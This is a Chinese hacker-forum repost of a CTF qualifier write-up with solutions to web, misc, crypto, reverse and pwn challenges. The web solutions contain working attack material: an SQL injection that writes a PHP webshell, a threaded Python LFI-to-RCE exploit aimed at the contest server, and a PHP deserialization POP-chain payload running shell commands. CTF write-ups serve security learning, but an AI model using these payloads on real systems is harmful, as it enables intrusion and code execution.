跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

河北师范大学信息安全挑战赛 - 初赛writup

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于

WEB

mmmmd5d5d5d5

链接打开页面

image

绕过

?a[]=1&b[]=2

image

构造md5

<?php
for($i = 0 ; $i <= 100000 ; $i ++)
{
 if (substr(md5($i) , 5, 5) === "3ddc6")
 {
  echo $i;
  break;
 }
}
?>

进入到下一层

image

提交

ffifdyop

得到:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

image

构造payload:

param1[]=1&param2[]=2

即可得到flag

EDGnb(签到)

直接docker桌面版打开

image

即可得到flag

时光塔的宝藏

链接打开一个login框

image

构造payload:

pswd=admin&usname=admin' union select 1,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1203.php';#

image

蚁剑连1203.php,密码为1,即可得到flag

image

LFI_to_RCE

<?php
    show_source('./index.php');
    include $_GET['file'];
?>

Warning: include(): Filename cannot be empty in /var/www/html/index.php on line 3

Warning: include(): Failed opening '' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 3

贴上exp:

import requests
import io
import threading

url = "http://81.70.102.209:10040/index.php"
sessid = "21r000"

def write(session):
    filebytes = io.BytesIO(b'a' * 1024 * 50)
    while True:
        res = session.post(url,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
                },
            cookies={
                'PHPSESSID': sessid
                },
            files={
                'file': ('21r000.jpg', filebytes)
                }
            )

def read(session):
    while True:
        res = session.post(url+"?file=/tmp/sess_"+sessid,
                           data={
                               "1":"system('ls /');"
                           },
                           cookies={
                               "PHPSESSID":sessid
                           }
                           )
        if "etc" in res.text:
            print(res.text)



if __name__ == "__main__":
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()
    evnet.set()

image

访问即可得到flag

unserialize

<?php
error_reporting(0);
include 'hint.php';
class x{
    public $value;
    public $cc;
    function __wakeup(){
        die('fighting!!!');
    }
}

class a {
    public $nice;
    public function __destruct()
    {
        $this->nice = unserialize($this->nice);
        $this->nice->value = $fake;
        if($this->nice->value === $this->nice->cc)
            $this->test->good();
    }
}

class b {
    public $value;
    public $array;
    public function good(){
        if(is_array($this->array)){
            ($this->array)($this->value);
        }
        else{
            echo 'must_array';
        }
    }
}

class c {
    public $value;
    public function shell($func) {
        if(preg_match('/^[a-z0-9]*$/isD',$func)){
            die('y0u_A2e_HacKK!'); 
        }
        else{
            $func($this->value);
        }
    }
}

if (isset($_GET['pop'])) {
    $pop = base64_decode($_GET['pop']);
    unserialize($pop);
} else {
    highlight_file(__FILE__);
}

pop链问题把a:2改成a:3

?pop=TzoxOiJhIjozOntzOjQ6Im5pY2UiO3M6Mzc6Ik86MToieCI6Mjp7czo1OiJ2YWx1ZSI7TjtzOjI6ImNjIjtOO30iO3M6NDoidGVzdCI7TzoxOiJiIjoyOntzOjU6InZhbHVlIjtzOjc6IlxzeXN0ZW0iO3M6NToiYXJyYXkiO2E6Mjp7aTowO086MToiYyI6MTp7czo1OiJ2YWx1ZSI7czo5OiJjYXQgL2ZsYWciO31pOjE7czo1OiJzaGVsbCI7fX19

贴上poc

<?php
class x{
    public $value;
    public $cc;
	public function __construct()
	{
		$this->value = $fake;
		$this->cc = $fake;
	}
    function __wakeup(){
        die('fighting!!!');
    }
}

class a {
    public $nice;
	public function __construct()
	{
		$this->nice = serialize(new x());
		$this->test = new b();
	}
    public function __destruct()
    {
        $this->nice = unserialize($this->nice);
        $this->nice->value = $fake;
        if($this->nice->value === $this->nice->cc)
            $this->test->good();
    }
}

class b {
    public $value = "\system";
    public $array ;
	public function __construct()
	{
		$this->array = [new c(), 'shell'];
	}
    public function good(){
        if(is_array($this->array)){
            ($this->array)($this->value);
        }
        else{
            echo 'must_array';
        }
    }
}

class c {
    public $value = "cat /flag";
    public function shell($func) {
        if(preg_match('/^[a-z0-9]*$/isD',$func)){
            die('y0u_A2e_HacKK!'); 
        }
        else{
            $func($this->value);
        }
    }
}

$a = new a();
echo serialize($a);
echo "<br>";
echo base64_encode(serialize($a));

?>

misc

快来公众号ya

image

扫码即可

JamesHarden

附件下载解压后修改文件后缀,加上.zip后解压文件是是一个.class文件:

image

对URPGS{Jr1p0zr_G0_U3pg6_!}进行rot13解密得到flag:

image

捉迷藏

附件打开文件为一个word文档

image

根据文字提示,将作文内容字体大小改为12

发现为jsfuck加密

image

http://codertab.com/JsUnFuck在线网站中解密

解密得到flag

image

迷途的狗狗

附件打开

image

打开迷途的狗狗文件夹

image

压缩包中有一张图片,但是需要密码

在ziperello中使用暴力破击,字符集设定为数字

image

image

得到密码为142345,成功解压文件得到一张图片

image

在kali中使用binwalk分析文件内容

image

发现隐藏图片中隐藏了一个jpg文件

使用foremost分离文件

image

第二张图片中显示flag

image

snake

玩到6000分给了个提示

image

溯源找到源码

image

重新修改show_text函数

image

image

进行pyinstaller反打包后有个snake.pyc,pyc反编译成py后就是它的源码

image

image

得到flag:

image

问卷调查

简简单单签个退吧就,下次继续。

crypto

签到

附件打开

image

与佛论禅解密得到一串base64密文

SkJDVUdWQ0dQTlRXNjMzRUw1V0hLWTNMTDVURzY0UzdQRlhYSzdJPQ==

解密后再base32解密得到flag:

image

RSA_e_n

附件:

image

rsa中的e,n,c解密,直接上脚本:

import gmpy2
import RSAwienerHacker

e = 0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05aa11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2e0360560a162729e91b7775bda70177e0f875626e0a81bd4eacea9948b02232a82659f8d9aa9b4c754f
n = 0x75be564267f8bf6c2038dd0cadfeecbc3158acfc27e679dd0bdb0db0e90bd5198a0a7edc0626f357a2d75f3c37ede045b7f7ca6bda79e5bf6fc0aea0aa7beda587388599d2b77b538fc3e666784493ffaf731e2ae232e8e9e9f9f2a4df25c19b7680f5bf6c485bd87923f01c17d8ec35438772c28e361774e6e7681d67ecbe19
c = 10127659956533419108589656976567211166527205183773088147543122705230809548550336271584049969380709512046523116316965506372940655242616078713681678662841367955124154879878984026023241163358487655249424233120021240245459984899558747887087199609289148343740081670749999484769650710161617077523656215330005636913
#爆破d
d = RSAwienerHacker.hack_RSA(e,n)
print(d)
m = gmpy2.powmod(c,d,n)
import binascii
print(binascii.unhexlify(hex(m)[2:]))

解得flag:

image

Tool

附件:

image

看上去是一串乱码,但是不难看出是维吉尼亚,直接丢在线网站得到key

image

根据恢复后的最后一段提示:

Well, you already know that this is Virginia encryption, but unfortunately, the ultimate goal is not to get plaintext, but to get the key. For the flag of this question, you need to add an underscore in the middle of the key, and then add the flag standard format to it, and you can submit it.

在中间加入下划线即可得到flag

encode

附件:

image

emoji表情加密,直接在线解,得到:

复制代码
  • 1
你好呀,送你串字符吧:ɯlxɹƃluʌ‾ʌdɹo‾ɟlq‾lʍ : dǝʇs ʇsɐl

文本倒序得到下一步:

image

根据题目提示《逾越节的阴谋》

image

可以知道是埃特巴什密码,解码后即可得到flag。

image

出题人flag改慢了emmmmm,血没了,暴打出题人。

re

hard

附件文本格式打卡,直接搜HECTF即可

image

pwn

签到

用wirshark追踪tcp流

image

来源: https://www.cnblogs.com/21r000/p/15553844.html#%E7%AD%BE%E5%88%B0-1


创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。